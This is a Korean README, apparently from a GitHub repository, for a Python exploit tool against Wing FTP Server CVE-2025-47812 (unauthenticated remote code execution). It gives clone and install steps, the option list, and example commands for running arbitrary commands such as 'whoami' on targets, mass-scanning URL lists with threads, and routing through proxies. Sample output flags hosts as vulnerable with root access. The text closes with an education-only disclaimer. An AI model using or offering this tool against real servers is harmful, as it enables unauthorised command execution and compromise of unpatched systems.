
Wing FTP Server CVE-2025-47812용 익스플로잇으로, 인증 없이 원격 코드 실행을 가능하게 하며, 다중 대상 스캔, 프록시 지원, 다양한 출력 형식을 제공합니다.
Wing FTP Server CVE-2025-47812 개선된 익스플로잇 - 인증되지 않은 원격 코드 실행 (RCE)
이 저장소를 클론하고 디렉터리로 이동하세요:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
또는 CVE-2025-47812.py 스크립트를 다운로드하여 실행하세요.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Wing FTP Server CVE-2025-47812 익스플로잇 - 개선 버전
옵션:
-h, --help 이 도움말 메시지 표시
-u URL, --url URL 대상 URL (예: http://192.168.1.100:5466)
-f FILE, --file FILE URL 목록 파일 (한 줄에 하나)
-c COMMAND, --command COMMAND
실행할 명령어 (기본값: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
사용자 이름 (기본값: anonymous)
-P PASSWORD, --password PASSWORD
비밀번호 (기본값: 빈 문자열)
--check 확인 모드: 취약한지 여부만 확인 (무해한 명령어 사용)
-v, --verbose 상세 모드 (세부 정보 표시)
--proxy PROXY 프록시 (예: http://127.0.0.1:8080)
--timeout TIMEOUT 타임아웃 (초 단위, 기본값: 10)
-o OUTPUT, --output OUTPUT
결과 저장용 출력 파일
--output-format {txt,json,csv}
출력 형식 (기본값: txt)
--threads THREADS 다중 대상 스캔 시 스레드 수 (기본값: 5)
--no-progress 진행 표시줄 숨기기
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
파일은 한 줄에 하나의 URL을 포함해야 합니다. 예:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABLE - 사용자: root
http://192.168.1.11:5466 - SEGURO - 취약하지 않음
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "사용자: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,사용자: root
이 익스플로잇은 교육 목적과 허가된 보안 테스트용으로만 설계되었습니다. 명시적 동의 없이 시스템에 이 도구를 무단 사용하는 것은 불법이며 심각한 법적 결과를 초래할 수 있습니다. 저자는 오용에 대해 책임을 지지 않습니다.
이 작업이 마음에 드신다면 GitHub에서 ⭐ 별을 눌러주세요!
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.